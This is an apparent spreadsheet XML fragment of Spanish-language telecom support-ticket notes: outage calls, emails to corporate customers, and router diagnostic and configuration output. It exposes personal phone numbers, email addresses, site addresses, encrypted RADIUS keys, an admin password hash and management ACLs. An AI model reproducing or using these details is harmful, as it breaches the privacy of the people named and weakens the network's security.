    !!!!!.!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!..!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!.!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.18.48.234 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    984 PACKET(S) RECEIVED
    1.60% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/9 MS
&lt;GNCYGTLON2D1D02A02EIM2&gt;</t>
  </si>
  <si>
    <t>TECNICO ASIGNADO BYRON GASPARICO 58261005  INDICA QUE SE REALIZO MEDICION  Y DESDE EL CLIENTE SE VE EL CORTE A 1800 MTS  SE ANDA BUSCANDO EL CORTE || AVANCES EN 1 HORA</t>
  </si>
  <si>
    <t>F4623980</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 16:10
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 1613956OH ::: TICKET CNOC IMBBL004437 ::: "FUERA DE SERVICIO"
*-*-*-*</t>
  </si>
  <si>
    <t>F4623987</t>
  </si>
  <si>
    <t>*/*/*/COLA DE CORREOS:
C677 - CAIDO SERVICIO DE INTERNET CLARO - CON ID 38300533
*/*/*/*/</t>
  </si>
  <si>
    <t>F4624016</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GABRIELA MARROQUIN 30663709 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001400966</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GABRIELA MARROQUIN 30663709 MENCIONA QUE EL SERVICIO ES INTERMITENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001257400</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE LOS TÉCNICOS PARA LOS TÉCNICOS QUE SE PRESENTARA EN SITIO  // A LA ESPERA DE LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 09:47
PARA: MMARROQUIN@CLAI.COM &lt;MMARROQUIN@CLAI.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 956100001T | CLAI PAYMENTS GUATEMALA S.A.
BUEN DÍA ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS PARA LOS TÉCNICOS QUE SE PRESENTARA EN SITIO.
DIRECCIÓN.  INTERNET_3 AVENIDA 10-80 ZONA 10 EDIFICIO FORUM ZONA VIVA FORUM 2 NIVEL 4 OFICINA 402 GUATEMALA GUAT
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.
  MARLON MUÑOZ       IBM 652515
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4624037</t>
  </si>
  <si>
    <t>CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 1 DE JULIO DE 2022 18:55PARA: TELECOMVPC@ICASA.COM.GT &lt;TELECOMVPC@ICASA.COM.GT&gt;; USCTELECOM@ICASA.COM.GT &lt;USCTELECOM@ICASA.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_CERVECERIA_GT_MINIBODEGA_LIVINGSTO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4037
ID: 86100072T
IDENTIFICADOR DEL CLIENTE:  CC_CERVECERIA_GT_MINIBODEGA_LIVINGSTON
UBICADO EN: DISTRIBUIDORA ULTRA RAPIDA, S.A. PRINCIPAL LIVINGSTON, BARRIO SAN JOSÉ, LIVINGSTON 15.82770721262341
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE SOLICITANDO APOYO CON LA VERIFICACION DE EQUIPOS
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: SÁBADO, 2 DE JULIO DE 2022 10:03PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;; TELECOMVPC@ICASA.COM.GT &lt;TELECOMVPC@ICASA.COM.GT&gt;; USCTELECOM@ICASA.COM.GT &lt;USCTELECOM@ICASA.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: RE: ENLACE ALARMADO PARA CLIENTE "CC_CERVECERIA_GT_MINIBODEGA_LIVINGSTON"
BUENOS DIAS ESTIMADOS, SOLICITAMOS DE SU APOYO CON EL CORREO QUE ANTECEDE YA QUE EL ENLACE CONTINUA CAIDO.
ESTAMOS PENDIENTES DE CUALQUIER AVANCE QUE PUEDAN PROPORCIONARNOS.
SALUDOS CORDIALES.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 1 DE JULIO DE 2022 18:55PARA: TELECOMVPC@ICASA.COM.GT &lt;TELECOMVPC@ICASA.COM.GT&gt;; USCTELECOM@ICASA.COM.GT &lt;USCTELECOM@ICASA.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_CERVECERIA_GT_MINIBODEGA_LIVINGSTO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4037
ID: 86100072T
IDENTIFICADOR DEL CLIENTE:  CC_CERVECERIA_GT_MINIBODEGA_LIVINGSTON
UBICADO EN: DISTRIBUIDORA ULTRA RAPIDA, S.A. PRINCIPAL LIVINGSTON, BARRIO SAN JOSÉ, LIVINGSTON 15.82770721262341
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4624048</t>
  </si>
  <si>
    <t>SE RESPONDE VIA CORREO A CL-</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CL
C136 - CAIDO ENLACE CLARO - CON ID 38300302; 625900188</t>
  </si>
  <si>
    <t>F4624050</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE UMAÑA AL 78523930 - 23194660  INDICA QUE AUN ESTA VIENDO PERDIDA DE DATOS || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001274593- 3001274970
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE UMAÑA  - 78523930 INDICA QUE ESTA DETECTANDO PARAMETROS QUE NO ESTAN BIEN || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
-ID 3001733121
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE UMAÑA  - 78523930 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001714347
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JORGE UMAÑA 78523930 SE REALIZARON PRUEBAS Y SE DETECTO QUE EL PUERTO HACIA SU LAN ESTA NEGOCIACIANDO DEN HALF-DUPLEX, 100M, SE PASA A 1GFDX EN EL CPE DE CLARO, PERO PUERTO SE CAE,  SE LE SOLICITA REVISAR SU RED INTERNA Y CONFIGURAR SU EQUIPO LAN A 1G FDX, INFORMA QUE LO ESTARA REALIZANDO, SOLICITA LLAMADA DESEPUES DE MEDIO DIA.
ID1383044#SH INT GI0/1/0
GIGABITETHERNET0/1/0 IS UP, LINE PROTOCOL IS UP (CONNECTED)
  HARDWARE IS C1111-ES-4, ADDRESS IS 5C71.0D3B.6808 (BIA 5C71.0D3B.6808)
  MTU 1500 BYTES, BW 100000 KBIT/SEC, DLY 100 USEC,
     RELIABILITY 255/255, TXLOAD 141/255, RXLOAD 23/255
  ENCAPSULATION ARPA, LOOPBACK NOT SET
  KEEPALIVE NOT SUPPORTED
  HALF-DUPLEX, 100MB/S, LINK TYPE IS AUTO, MEDIA TYPE IS 10/100/1000BASETX
  INPUT FLOW-CONTROL IS OFF, OUTPUT FLOW-CONTROL IS UNSUPPORTED
  ARP TYPE: ARPA, ARP TIMEOUT 04:00:00
  LAST INPUT 00:00:02, OUTPUT 00:00:14, OUTPUT HANG NEVER
  LAST CLEARING OF "SHOW INTERFACE" COUNTERS NEVER
  INPUT QUEUE: 0/375/0/0 (SIZE/MAX/DROPS/FLUSHES); TOTAL OUTPUT DROPS: 0
  QUEUEING STRATEGY: FIFO
  OUTPUT QUEUE: 0/40 (SIZE/MAX)
  5 MINUTE INPUT RATE 9065000 BITS/SEC, 3396 PACKETS/SEC
  5 MINUTE OUTPUT RATE 55350000 BITS/SEC, 6632 PACKETS/SEC
     64070073421 PACKETS INPUT, 12014046350402 BYTES, 0 NO BUFFER
     RECEIVED 9 BROADCASTS (587891 MULTICASTS)
     0 RUNTS, 0 GIANTS, 0 THROTTLES
     0 INPUT ERRORS, 0 CRC, 0 FRAME, 15187649 OVERRUN, 0 IGNORED
     0 WATCHDOG, 587891 MULTICAST, 42 PAUSE INPUT
     0 INPUT PACKETS WITH DRIBBLE CONDITION DETECTED
     131103186964 PACKETS OUTPUT, 68704010857812 BYTES, 0 UNDERRUNS
     16 OUTPUT ERRORS, 16 COLLISIONS, 4 INTERFACE RESETS
     587814 UNKNOWN PROTOCOL DROPS
     0 BABBLES, 0 LATE COLLISION, 0 DEFERRED
     2 LOST CARRIER, 0 NO CARRIER, 0 PAUSE OUTPUT
     0 OUTPUT BUFFER FAILURES, 0 OUTPUT BUFFERS SWAPPED OUT
SE ENVIA CORREO A CLIENTE:
RE: INC7768014 || PERFORMANCE ISSUE ON THE WAN LINK CLARO 1383044</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE Y SE CONTESTA, SE LE SOLICITA CORREGIR LA CONFIGURACION DE SU PUERTO LAN:
INC7768014 || PERFORMANCE ISSUE ON THE WAN LINK CLARO 1383044</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE UMAÑA AL 78523930 - 23194660 NO RESPONDE || SE INTENTARA LUEGO**
-ID 3001269633 - 3001269887
**</t>
  </si>
  <si>
    <t>F4624054</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS PAREDES AL 77712699 - 79869353 NO RESPONDE |  SE INTENTARA LUEGO **
-ID 3001277609 - 3001277871
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS PAREDES AL 77512699 INDICA QUE YA REVISO INTERNAMENTE QUE LEVANTO EL SERVICIO Y SOLO SOLICITA QUE SE REVISE Y QUE SE LE INDIQUE COMO NOS APARECE AHORA || SE NOTIFICA A GESTOR  **
ID 3001328608
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS PAREDES AL 77712699 - 79869353 PRIMER NUMERO NO RESPONDE Y EL SEGUNGO NUMERO CONTESTA EL SEÑOR CARLOS GONZALEZ QUIEN SOLICITA QUE SE LE LLAME AL SEÑOR CARLOS AL NUMERO 77512699 **
-ID 3001297941 - 3001298081
**</t>
  </si>
  <si>
    <t>F4624056</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GETZALI NICOLAS 36360915 MENCIONA QUE EL SERVICIO SE ENCUENTRA FUNCIONANDO CORRECTAMENTE
CLIENTE SOLICITA CAMBIO DE ROUTER, SE LE INDICA QUE EL SEGUIMIENTO ES CON SU EJECUTIVO
SE LE BRINDA DATO DE EJECUTIVO SEGUN ABC
-ID 3001277390</t>
  </si>
  <si>
    <t>F4624058</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. VICTOR JUAREZ 45836625 CONFIRMA QUE LOS EQUIPOS ESTAN ENCENDIDOS, APLICO REINICIO PERO NO LEVANTA EL ENLACE.
ETX-1
PWR: ROJO
NET1: APAGADO
USER3: VERDE</t>
  </si>
  <si>
    <t>F4624061</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EDWIN PEREZ 72112657- 76406613 NO RESPONDE EL PRIMER NUMERO Y EL SEGUNDO NUMERO INDICA QUE ES NUMERO EQUIVOCADO **
ID 3001348463 - 3001348655
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EDWIN PEREZ AL 72112657 INDICA QUE REINICIO LOS EQUIPOS PERO NO LEVANTO QUE EL EQUIPO NO ENCIENDE INDICA BRINDA LOS SIGUIENTES DATOS PARA VISITA **
HORARIO DE ATENCION: 9:00 A 15:00 HRS
GESTION DE PERMISOS: SE NECESITAN PERMISOS ENVIAR LISTADO DEL PERSONAL TECNICO AL CORREO EDWIN.PEREZ@INTEGRAL.COM.SV
DIRECCCION: 3ERA AVE NORTE LOCAL 2-3 BARRIO EL CENTRO LA UNION
ATENDERA EN SITIO: NO CUENTA CON NOMBRE LO INDICARA EN EL CORREO
-ID 3001287548
**</t>
  </si>
  <si>
    <t>F4624070</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE VALIDANDO SERVICIO.
RE: REPORTE DE CAÍDA TOTAL CON ROATAN 02 - MALL MEGAPLAZA 192.168.82.0/24</t>
  </si>
  <si>
    <t>F4624096</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. RICARDO MORALES 57516318 SE LE INFORMA DEL INCIDENTE, ENLACE A 20 MEGAS, CONFIRMA DE ENTERADO, SE PROCEDE AL CIERRE DEL INCIDENTE.
CONFIG DEL CPE:
CT2#TEL 192.168.196.130
TRYING 192.168.196.130 ... OPEN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LOGIN AUTHENTICATION
USERNAME:ADMIN
PASSWORD:
ERROR: AUTHENTICATION FAILED.
  ERROR:LOGGED FAIL!
  PLEASE RETRY AFTER 5 SECONDS.
USERNAME:GESTIONIP
PASSWORD:
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;SCREEN-LENGTH 0 TEMPORARY
INFO: THE CONFIGURATION TAKES EFFECT ON THE CURRENT USER TERMINAL INTERFACE ONLY.
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;DISP IP INT BRIEF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CELLULAR0/0/0                     UNASSIGNED           DOWN       DOWN
ETHERNET0/0/4                     192.168.196.130/30   UP         UP
GIGABITETHERNET0/0/0              UNASSIGNED           UP         DOWN
LOOPBACK502                       10.13.154.68/32      UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           190.143.218.177/30   UP         UP
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;DISP DEVICE SLOT 0
AR121'S DEVICE STATUS:
SLOT  SUB TYPE             ONLINE   POWER     REGISTER      ALARM        PRIMARY
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0     -   AR121            PRESENT  POWERON   REGISTERED    NORMAL       MASTER
-------------------------------------------------------------------------------
  BOARD NAME        : AR121
  BOARD DESCRIPTION : AR121
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
  PORT  PORT         OPTIC    MDI   SPEED  DUPLEX  FLOW-    PORT     POE
        TYPE         STATUS         (MBPS)         CTRL     STATE    STATE
-------------------------------------------------------------------------------
  4     ETH(C)       -        AUTO  100    FULL    DISABLE  UP       -
  0     ETH(C)       -        AUTO  100    FULL    DISABLE  UP       -
  1     ETH(C)       -        AUTO  100    FULL    DISABLE  DOWN     -
  2     ETH(C)       -        AUTO  100    FULL    DISABLE  DOWN     -
  3     ETH(C)       -        AUTO  100    FULL    DISABLE  DOWN     -
  5     GE(C)        -        AUTO  1000   FULL    DISABLE  UP       -
  6     CELLULAR(-)  -        -     10     -       -        -        -
-------------------------------------------------------------------------------
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt; DISP INT DES
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
(V): VIRTUALPORT
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     DOWN    DOWN     HUAWEI, AR SERIES, CELLULAR0/0/0
                                               INTERFACE
ETH0/0/0                      UP      UP       "LAN CLIENTE"
ETH0/0/1                      DOWN    DOWN     "LAN CLIENTE"
ETH0/0/2                      DOWN    DOWN     "LAN CLIENTE"
ETH0/0/3                      DOWN    DOWN     "LAN CLIENTE"
ETH0/0/4                      UP      UP       HUAWEI, AR SERIES, ETHERNET0/0/4
                                               INTERFACE
GE0/0/0(V)                    UP      DOWN     VIRTUALPORT
LOOP502                       UP      UP(S)    HUAWEI, AR SERIES, LOOPBACK502 IN
                                               TERFACE
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC
                                               E
VLANIF1                       UP      UP       "LAN PUBLICAS CLIENTE"
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;DISP ARP ALL
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
192.168.196.130 60F1-8ACB-276C            I -         ETH0/0/4
192.168.196.129 001D-7083-2580  19        D-0         ETH0/0/4
190.143.218.177 60F1-8ACB-276B            I -         VLANIF1
190.143.218.178 000C-2933-62F8  5         D-0         ETH0/0/0
                                             1/-
190.143.218.176 INCOMPLETE      1         D-0         VLANIF1
                                             1/-
------------------------------------------------------------------------------
TOTAL:5         DYNAMIC:3       STATIC:0     INTERFACE:2
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;DISP MAC-AD
-------------------------------------------------------------------------------
MAC ADDRESS       VLAN/BRIDGE/VSI/BD      LEARNED-FROM               TYPE
-------------------------------------------------------------------------------
000C-2933-62F8       1/-/-                ETH0/0/0                   DYNAMIC
-------------------------------------------------------------------------------
TOTAL ITEMS DISPLAYED = 1
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;DISP VER
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR120 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR121 ROUTER UPTIME IS 0 WEEK, 0 DAY, 1 HOUR, 1 MINUTE
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 1 HOUR, 0 MINUTE
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR121 VER.D
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR121
4. BOOTROM  VERSION  : 1
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;DISP LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 13
2020-10-18 04:50:19+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01INFO/4/SUPPRESS_LOG(L)[0]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=4280094721, MODULENAME=SECE, INFOALIAS=ARPMISS)
2020-10-18 04:45:04+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01INFO/4/SUPPRESS_LOG(L)[1]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=4280094721, MODULENAME=SECE, INFOALIAS=ARPMISS)
2020-10-18 04:38:52+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01IFNET/4/LINK_STATE(L)[2]:THE LINE PROTOCOL IP ON THE INTERFACE VLANIF1 HAS ENTERED THE UP STATE.
2020-10-18 04:38:52+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01IFNET/4/IF_STATE(L)[3]:INTERFACE VLANIF1 HAS TURNED INTO UP STATE.
2020-10-18 04:38:51+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01IFPDT/4/IF_STATE(L)[4]:INTERFACE ETHERNET0/0/0 HAS TURNED INTO UP STATE.
2020-10-18 04:38:51+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01DEV/4/ENTUP(L)[5]:AR121 BOARD[0] REGISTER SUCCESS.
2020-10-18 04:38:48+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01RM/4/IPV4_DEFT_RT_CHG(L)[6]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=ADD, INSTANCEID=0, PROTOCOL=STATIC, EXITIF=ETHERNET0/0/4, NEXTHOP=192.168.196.129, NEIGHBOUR=0.0.0.0, PREFERENCE=60, LABEL=NULL, METRIC=0)
2020-10-18 04:38:47+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01IFNET/4/LINK_STATE(L)[7]:THE LINE PROTOCOL IP ON THE INTERFACE ETHERNET0/0/4 HAS ENTERED THE UP STATE.
2020-10-18 04:38:47+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01IFPDT/4/IF_STATE(L)[8]:INTERFACE ETHERNET0/0/4 HAS TURNED INTO UP STATE.
2020-10-18 04:38:46+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01IFPDT/4/IF_STATE(L)[9]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
2020-10-18 04:38:40+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01RM/4/ROUTERID_CHANGE(L)[10]:THE ROUTER ID IS 190.143.218.177. (INSTANCEID=0)
2020-10-18 04:38:37+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01IFNET/4/LINK_STATE(L)[11]:THE LINE PROTOCOL IP ON THE INTERFACE LOOPBACK502 HAS ENTERED THE UP STATE.
2020-10-18 04:37:31+00:00 DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB %%01GTL/4/STATECHANGED(L)[12]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;DISP CLOCK
2020-10-18 05:39:32
SUNDAY
TIME ZONE(DEFAULT ZONE NAME) : UTC+00:00
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;DISP SN
EQUIPMENT SN(ESN): 21500102172SJ9600191
LICENSE ESN: 21500102172SJ9600191
SLOT  SUB TYPE             SN                       P/N
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0     --  AR121            21500102172SJ9600191     50010217
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;DISP CUR
[V200R009C00SPC500]
#
 SYSNAME DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB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DROP ILLEGAL-MAC ALARM
#
IPV6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16.184.96.4
DNS SERVER 190.143.189.36
DNS PROXY ENABLE
#
DHCP ENABLE
#
RADIUS-SERVER TEMPLATE DEFAULT
RADIUS-SERVER TEMPLATE RADIUS
 RADIUS-SERVER SHARED-KEY CIPHER %^%#F3DLKI/.H,&gt;CB#P&amp;GAE#OU*B~_+WW#EPG#8QJI:U%^%#
 RADIUS-SERVER AUTHENTICATION 10.10.4.100 1812 SOURCE LOOPBACK 502 WEIGHT 80
 RADIUS-SERVER ACCOUNTING 10.10.4.100 1813 SOURCE LOOPBACK 502 WEIGHT 80
 UNDO RADIUS-SERVER USER-NAME DOMAIN-INCLUDED
RADIUS-SERVER AUTHORIZATION 10.10.4.100 SHARED-KEY CIPHER %^%#TBH8HK#O|"{KVL.DB^JGCOSC$$BNYUXS{P;`(D;8%^%#
#
PKI REALM DEFAULT
#
SSL POLICY DEFAULT_POLICY TYPE SERVER
 PKI-REALM DEFAULT
 VERSION TLS1.0 TLS1.1
 CIPHERSUITE RSA_AES_128_CBC_SHA
#
ACL NUMBER 2988
 DESCRIPTION MONITOREO DE CLARO
 RULE 1 PERMIT SOURCE 10.255.24.144 0.0.0.7
 RULE 2 PERMIT SOURCE 190.148.15.192 0.0.0.15
#
ACL NUMBER 3001
 DESCRIPTION "RADIUS_ACCESO"
 STEP 1
 RULE 2 PERMIT TCP SOURCE 10.120.26.0 0.0.0.255 DESTINATION-PORT EQ TELNET
 RULE 3 PERMIT TCP SOURCE 192.168.0.0 0.0.255.255 DESTINATION-PORT EQ TELNET
 RULE 4 PERMIT TCP SOURCE 66.119.95.0 0.0.0.255 DESTINATION-PORT EQ TELNET
 RULE 5 PERMIT TCP SOURCE 10.10.0.0 0.0.255.255 DESTINATION-PORT EQ TELNET
 RULE 6 DENY TCP DESTINATION-PORT EQ TELNET
 RULE 7 DENY TCP DESTINATION-PORT EQ 22
ACL NAME ACCESO 3999
 RULE 1 PERMIT IP SOURCE 190.148.15.192 0.0.0.15
 RULE 2 PERMIT IP SOURCE 10.255.24.144 0.0.0.7
 RULE 3 PERMIT IP SOURCE 10.0.0.0 0.255.255.255
 RULE 4 PERMIT IP SOURCE 192.168.0.0 0.0.255.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LNET TERMINAL SSH FTP HTTP
 LOCAL-USER GESTIONIP PASSWORD IRREVERSIBLE-CIPHER $1A$@#I#,#VVQ=$AFCR2NZIS-Y)|C)Q5TMCNQD_!EM9G.'CH[JV)-!I$
 LOCAL-USER GESTIONIP PRIVILEGE LEVEL 15
 LOCAL-USER GESTIONIP SERVICE-TYPE TELNET TERMINAL SSH
#
WEB
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
NAT ALG DNS ENABLE
#
INTERFACE VLANIF1
 DESCRIPTION "LAN PUBLICAS CLIENTE"
 IP ADDRESS 190.143.218.177 255.255.255.252
#
INTERFACE ETHERNET0/0/0
 DESCRIPTION "LAN CLIENTE"
 AUTO DUPLEX FULL
#
INTERFACE ETHERNET0/0/1
 DESCRIPTION "LAN CLIENTE"
 AUTO DUPLEX FULL
#
INTERFACE ETHERNET0/0/2
 DESCRIPTION "LAN CLIENTE"
 AUTO DUPLEX FULL
#
INTERFACE ETHERNET0/0/3
 DESCRIPTION "LAN CLIENTE"
 AUTO DUPLEX FULL
#
INTERFACE ETHERNET0/0/4
 MTU 1600
 TCP ADJUST-MSS 1200
 IP ADDRESS 192.168.196.130 255.255.255.252
#
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION VIRTUALPORT
 IP ADDRESS DHCP-ALLOC
#
INTERFACE CELLULAR0/0/0
#
INTERFACE NULL0
#
INTERFACE LOOPBACK502
 IP ADDRESS 10.13.154.68 255.255.255.255
#
